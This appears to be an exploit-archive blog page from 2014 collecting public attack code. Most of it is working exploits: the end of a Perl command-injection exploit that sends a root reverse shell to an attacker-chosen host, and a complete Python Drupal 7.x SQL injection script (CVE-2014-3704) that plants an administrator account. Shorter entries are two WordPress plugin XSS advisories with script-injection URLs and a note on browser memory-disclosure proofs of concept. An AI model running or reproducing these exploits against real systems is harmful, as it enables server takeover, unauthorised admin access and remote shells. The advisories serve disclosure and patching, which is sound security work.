'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();
 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$vuln", Authorization => "Basic $encoded");
unless ($status->is_success) {
banner();
print "[-] Error: " . $status->status_line . "\n";
exit;
}
 
banner();
print "[*] MorXploiting $host/$vuln\n";
 
#my $payload = "sudo /bin/bash -i >%26 /dev/tcp/$cbhost/$cbport 0>%261"; # Bash connect back
my $payload = "sudo /bin/bash -c \"perl -e '\\\$p=fork;exit,if(\\\$p); use Socket; use FileHandle; my \\\$system = \\\"/bin/sh\\\"; my \\\$host = \\\"$cbhost\\\"; my \\\$port = \\\"$cbport\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\")); connect(SOCKET, sockaddr_in(\\\$port, inet_aton(\\\$host))); SOCKET->autoflush(); open(STDIN, \\\">%26SOCKET\\\"); open(STDOUT,\\\">%26SOCKET\\\"); open(STDERR,\\\">%26SOCKET\\\"); print \\\"[%2b] Et voila you are in!\\\\n\\\\n\\\"; system(\\\"uname -a;id\\\"); system(\\\$system);'\"";
my $exploit = $ua->get("$host/$vuln?lang=;$payload", Authorization => "Basic $encoded");
print "[+] Sent payload! Waiting for connect back root shell ...\n";
 
my $a_sock = $l_sock->accept();
$l_sock->shutdown(SHUT_RDWR);
copy_data_bidi($a_sock);
 
sub copy_data_bidi {
my ($socket) = @_;
my $child_pid = fork();
if (! $child_pid) {
close(STDIN);
copy_data_mono($socket, *STDOUT);
$socket->shutdown(SHUT_RD);
exit();
} else {
close(STDOUT);
copy_data_mono(*STDIN, $socket);
$socket->shutdown(SHUT_WR);
kill("TERM", $child_pid);
}
}
sub copy_data_mono {
my ($src, $dst) = @_;
my $buf;
while (my $read_len = sysread($src, $buf, 4096)) {
my $write_len = $read_len;
while ($write_len) {
my $written_len = syswrite($dst, $buf);
return unless $written_len;
$write_len -= $written_len;
}
}
}

(85)

17Oct/140

Drupal 7.X SQL Injection

#!/usr/bin/python
#
# 
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)
#
# Tested on Drupal 7.31 with BackBox 3.x
#
# This material is intended for educational 
# purposes only and the author can not be held liable for 
# any kind of damages done whatsoever to your machine, 
# or damages caused by some other,creative application of this material.
# In any case you disagree with the above statement,stop here.
 
import hashlib, urllib2, optparse, random, sys
 
# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.
 
class DrupalHash:
 
  def __init__(self, stored_hash, password):
    self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    self.last_hash = self.rehash(stored_hash, password)
 
  def get_hash(self):
    return self.last_hash
 
  def password_get_count_log2(self, setting):
    return self.itoa64.index(setting[3])
 
  def password_crypt(self, algo, password, setting):
    setting = setting[0:12]
    if setting[0] != '$' or setting[2] != '$':
      return False
 
    count_log2 = self.password_get_count_log2(setting)
    salt = setting[4:12]
    if len(salt) < 8:
      return False
    count = 1 << count_log2
 
    if algo == 'md5':
      hash_func = hashlib.md5
    elif algo == 'sha512':
      hash_func = hashlib.sha512
    else:
      return False
    hash_str = hash_func(salt + password).digest()
    for c in range(count):
      hash_str = hash_func(hash_str + password).digest()
    output = setting + self.custom64(hash_str)
    return output
 
  def custom64(self, string, count = 0):
    if count == 0:
      count = len(string)
    output = ''
    i = 0
    itoa64 = self.itoa64
    while 1:
      value = ord(string[i])
      i += 1
      output += itoa64[value & 0x3f]
      if i < count:
        value |= ord(string[i]) << 8
      output += itoa64[(value >> 6) & 0x3f]
      if i >= count:
        break
      i += 1
      if i < count:
        value |= ord(string[i]) << 16
      output += itoa64[(value >> 12) & 0x3f]
      if i >= count:
        break
      i += 1
      output += itoa64[(value >> 18) & 0x3f]
      if i >= count:
        break
    return output
 
  def rehash(self, stored_hash, password):
    # Drupal 6 compatibility
    if len(stored_hash) == 32 and stored_hash.find('$') == -1:
      return hashlib.md5(password).hexdigest()
      # Drupal 7
    if stored_hash[0:2] == 'U$':
      stored_hash = stored_hash[1:]
      password = hashlib.md5(password).hexdigest()
    hash_type = stored_hash[0:3]
    if hash_type == '$S$':
      hash_str = self.password_crypt('sha512', password, stored_hash)
    elif hash_type == '$H$' or hash_type == '$P$':
      hash_str = self.password_crypt('md5', password, stored_hash)
    else:
      hash_str = False
    return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
 
def randomAgentGen():
 
 userAgent =    ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
                'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
                'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
                'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
                'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
                'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
                'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
                'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
                'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
                'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
                'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
                'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
                'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
                'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
 
 UA = random.choice(userAgent)
 return UA
 
 
def urldrupal(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    # Page login
    url = url+'/?q=node&destination=node'
    return url
 
 
banner = """
  ______                          __     _______  _______ _____    
 |   _  \ .----.--.--.-----.---.-|  |   |   _   ||   _   | _   |   
 |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___|   |.|   |   
 |.  |    |__| |_____|   __|___._|__|      /   |___(__   `-|.  |   
 |:  1    /          |__|                 |   |  |:  1   | |:  |   
 |::.. . /                                |   |  |::.. . | |::.|   
 `------'                                 `---'  `-------' `---'   
  _______       __     ___       __            __   __             
 |   _   .-----|  |   |   .-----|__.-----.----|  |_|__.-----.-----.
 |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|  |  _  |     |
 |____   |__   |__|   |.  |__|__|  |_____|____|____|__|_____|__|__|
 |:  1   |  |__|      |:  |    |___|                               
 |::.. . |            |::.|                                        
 `-------'            `---'                                        
 
                                 Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
                                              Admin 4cc0unt cr3at0r
 
        Discovered by:
 
        Stefan  Horst
                         (CVE-2014-3704)
 
                           Written by:
 
                         Claudio Viviani
 
                      http://www.homelab.it
 
                         info@homelab.it
                     homelabit@protonmail.ch
 
                 https://www.facebook.com/homelabit
                   https://twitter.com/homelabit
                 https://plus.google.com/+HomelabIt1/
       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
"""
 
commandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\n')
commandList.add_option('-t', '--target',
                  action="store",
                  help="Insert URL: http[s]://www.victim.com",
                  )
commandList.add_option('-u', '--username',
                  action="store",
                  help="Insert username",
                  )
commandList.add_option('-p', '--pwd',
                  action="store",
                  help="Insert password",
                  )
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.username or not options.pwd:
    print(banner)
    print
    commandList.print_help()
    sys.exit(1)
 
print(banner)
 
host = options.target
user = options.username
password = options.pwd
 
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
 
target = urldrupal(host)
 
 
# Add new user:
# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' FROM users
#
# Set administrator permission (rid = 3):
# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)
#
post_data = "name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27"+user+"%27,+%27"+hash[:55]+"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27"+user+"%27),+3);;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"
 
UA = randomAgentGen()
try:
    req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })
    content = urllib2.urlopen(req).read()
 
    if "mb_strlen() expects parameter 1" in content:
        print "[!] VULNERABLE!"
        print
  print "[!] Administrator user created!"
  print
        print "[*] Login: "+str(user)
        print "[*] Pass: "+str(password)
        print "[*] Url: "+str(target)
 
    else:
        print "[X] NOT Vulnerable :("
 
except urllib2.HTTPError as e:
 
    print "[X] HTTP Error: "+str(e.reason)+" ("+str(e.code)+")"
 
except urllib2.URLError as e:
 
    print "[X] Connection error: "+str(e.reason)

(60)

16Oct/140

WordPress MaxButtons 1.26.0 Cross Site Scripting

Advisory ID: HTB23237
Product: MaxButtons WordPress plugin
Vendor: Max Foundry
Vulnerable Version(s): 1.26.0 and probably prior
Tested Version: 1.26.0
Advisory Publication:  September 24, 2014  [without technical details]
Vendor Notification: September 24, 2014 
Vendor Patch: October 2, 2014 
Public Disclosure: October 15, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7181
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered vulnerability in MaxButtons WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against logged-in  administrator. 
 
 
1) Reflected Cross-Site Scripting (XSS) in MaxButtons wordpress plugin: CVE-2014-7181
 
Input passed via the "id" HTTP GET parameter to "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
 
http://wordpress/wp-admin/admin.php?page=maxbuttons-controller&action=button&id=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to MaxButtons 1.26.1
 
More Information:
https://wordpress.org/plugins/maxbuttons/changelog/
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23237 - https://www.htbridge.com/advisory/HTB23237 - Reflected Cross-Site Scripting (XSS) in MaxButtons WordPress Plugin.
[2] MaxButtons WordPress plugin - http://maxfoundry.com/ - The best WordPress button generator.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

(97)

16Oct/140

WordPress WP Google Maps 6.0.26 Cross Site Scripting

Advisory ID: HTB23236
Product: WP Google Maps WordPress plugin
Vendor: WP Google Maps 
Vulnerable Version(s): 6.0.26 and probably prior
Tested Version: 6.0.26
Advisory Publication:  September 24, 2014  [without technical details]
Vendor Notification: September 24, 2014 
Vendor Patch: September 29, 2014 
Public Disclosure: October 15, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7182
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered three XSS vulnerabilities in WP Google Maps WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrators of vulnerable WP website.
 
1) Multiple XSS in WP Google Maps WordPress plugin: CVE-2014-7182
 
1.1 Input passed via the "poly_id" HTTP GET parameter to "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
 
http://wordpress/wp-admin/admin.php?page=wp-google-maps-menu&action=edit_poly&map_id=1&poly_id=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
1.2 Input passed via the "poly_id" HTTP GET parameter to "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
http://wordpress/wp-admin/admin.php?page=wp-google-maps-menu&action=edit_polyline&map_id=1&poly_id=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
1.3 Input passed via the "poly_id" HTTP GET parameter to "/wp-admin/admin.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:
http://wordpress/wp-admin/admin.php?page=wp-google-maps-menu&action=edit_marker&id=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to WP Google Maps 6.0.27
 
More Information:
https://wordpress.org/plugins/wp-google-maps/changelog/
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23236 - https://www.htbridge.com/advisory/HTB23236 - Multiple Cross-Site Scripting (XSS) in WP Google Maps WordPress Plugin.
[2] WP Google Maps WordPress plugin - http://www.wpgmaps.com/ - The easiest to use Google Maps plugin! Create custom Google Maps with high quality markers containing locations, descriptions, images and links. Add your customized map to your WordPress posts and/or pages quickly and easily with the supplied shortcode.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

(280)

14Oct/140

Mozilla browser mem disclosure bugs (CVE-2014-1580)

RIFERIMENTO: https://access.redhat.com/security/cve/CVE-2014-1580

CVE-2014-1580
Impatto: Moderate
Pubblico: 2014-10-14
Bugzilla: 1152362: CVE-2014-1580 Mozilla:
Further uninitialized memory use during GIF rendering (MFSA 2014-78)

Public POC:

First of all, CVE-2014-1580 (MSFA 2014-78) is a bug that caused Firefox prior to version 33 (released  today) to leak bits of uninitialized memory when rendering certain types of truncated images onto <canvas>.
 
Mozilla's advisory is here:
https://www.mozilla.org/security/announce/2014/mfsa2014-78.html
 
Bug is here:
https://bugzilla.mozilla.org/show_bug.cgi?id=1063733
 
PoC is here:
http://lcamtuf.coredump.cx/ffgif2/
 
Secondly, MSRC case #19611cz is a seemingly similar issue with Internet Explorer apparently using bits of uninitialized stack data when handling JPEG files with an oddball DHT. 
You should be able to reproduce with:
 
http://lcamtuf.coredump.cx/iepuzzle/canvas.html
 
This one doesn't have a fix yet; I decided to disclose it because it is easily hit with an existing open-source fuzzer, and because we went past the 90-day mark without making any evident progress on the report. 
The timeline is captured here:
 
http://lcamtuf.blogspot.com/2014/10/two-more-browser-memory-disclosure-bugs.html
 
Obligatory plug - both of these have been found with:
http://code.google.com/p/american-fuzzy-lop/

(108)